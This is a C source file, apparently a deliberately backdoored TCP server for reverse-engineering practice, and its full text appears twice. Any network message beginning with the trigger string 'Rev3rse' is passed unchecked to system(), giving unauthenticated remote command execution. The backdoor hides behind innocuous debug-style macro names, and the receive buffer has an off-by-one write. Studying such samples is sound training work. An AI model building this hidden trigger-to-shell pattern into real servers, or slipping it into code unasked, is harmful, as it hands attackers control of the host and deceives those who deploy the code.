tsumarios/vulnerable_server.c

## vulnerable_server.c
/* TCP server with Backdoor */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

/* Danger zone */
#define DEBUGMODE ((x)->int &MODE) // Just to define it
#define DEBUG_DOEVILTHINGS_SYSTEM(x) system(x)

#ifdef DEBUGMODE
#define DEBUGMODE3_INFO "Rev3rse"
#define DEBUG_PRETTY(x) DEBUG_DOEVILTHINGS_SYSTEM(x)
#endif
/* End danger zone */

// Check to trigger the backdoor
void evilCheck(char *buff)
{
    if (!memcmp(buff, DEBUGMODE3_INFO, 7))
    {
        printf("Triggered backdoor!\n");
        DEBUG_PRETTY(buff);
    }
}

// Main
int main(int argc, char **argv)
{
    int sockfd, newsockfd, n;
    struct sockaddr_in local_addr, remote_addr;
    socklen_t len;
    char buffRead[1024];

    if (argc < 2)
    {
        printf("Use: %s <PORT>\n", argv[0]);
        return 0;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("\nError opening the socket");
        return -1;
    }
    memset((char *)&local_addr, 0, sizeof(local_addr));
    local_addr.sin_family = AF_INET;
    local_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    local_addr.sin_port = htons(atoi(argv[1]));

    if (bind(sockfd, (struct sockaddr *)&local_addr, sizeof(local_addr)) < 0)
    {
        printf("\nError binding: %d \n", errno);
        return -1;
    }

    listen(sockfd, 5);
    printf(">> Listening on port: %s\n", argv[1]);

    // Listening
    while (1)
    {
        printf(">> Waiting for incoming connections...\n");

        memset(buffRead, '\0', sizeof buffRead);
        len = sizeof(remote_addr);
        newsockfd = accept(sockfd, (struct sockaddr *)&remote_addr, &len);

        n = recv(newsockfd, buffRead, sizeof buffRead, 0);
        if (n == 0)
            return 0;
        buffRead[n] = '\0';
        printf("<< Received: %s\n", buffRead);

        evilCheck(buffRead);

        close(newsockfd);

    }
}
	/* TCP server with Backdoor */

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#include <errno.h>

	/* Danger zone */
	#define DEBUGMODE ((x)->int &MODE) // Just to define it
	#define DEBUG_DOEVILTHINGS_SYSTEM(x) system(x)

	#ifdef DEBUGMODE
	#define DEBUGMODE3_INFO "Rev3rse"
	#define DEBUG_PRETTY(x) DEBUG_DOEVILTHINGS_SYSTEM(x)
	#endif
	/* End danger zone */

	// Check to trigger the backdoor
	void evilCheck(char *buff)
	{
	if (!memcmp(buff, DEBUGMODE3_INFO, 7))
	{
	printf("Triggered backdoor!\n");
	DEBUG_PRETTY(buff);
	}
	}

	// Main
	int main(int argc, char **argv)
	{
	int sockfd, newsockfd, n;
	struct sockaddr_in local_addr, remote_addr;
	socklen_t len;
	char buffRead[1024];

	if (argc < 2)
	{
	printf("Use: %s <PORT>\n", argv[0]);
	return 0;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
	{
	printf("\nError opening the socket");
	return -1;
	}
	memset((char *)&local_addr, 0, sizeof(local_addr));
	local_addr.sin_family = AF_INET;
	local_addr.sin_addr.s_addr = htonl(INADDR_ANY);
	local_addr.sin_port = htons(atoi(argv[1]));

	if (bind(sockfd, (struct sockaddr *)&local_addr, sizeof(local_addr)) < 0)
	{
	printf("\nError binding: %d \n", errno);
	return -1;
	}

	listen(sockfd, 5);
	printf(">> Listening on port: %s\n", argv[1]);

	// Listening
	while (1)
	{
	printf(">> Waiting for incoming connections...\n");

	memset(buffRead, '\0', sizeof buffRead);
	len = sizeof(remote_addr);
	newsockfd = accept(sockfd, (struct sockaddr *)&remote_addr, &len);

	n = recv(newsockfd, buffRead, sizeof buffRead, 0);
	if (n == 0)
	return 0;
	buffRead[n] = '\0';
	printf("<< Received: %s\n", buffRead);

	evilCheck(buffRead);

	close(newsockfd);

	}
	}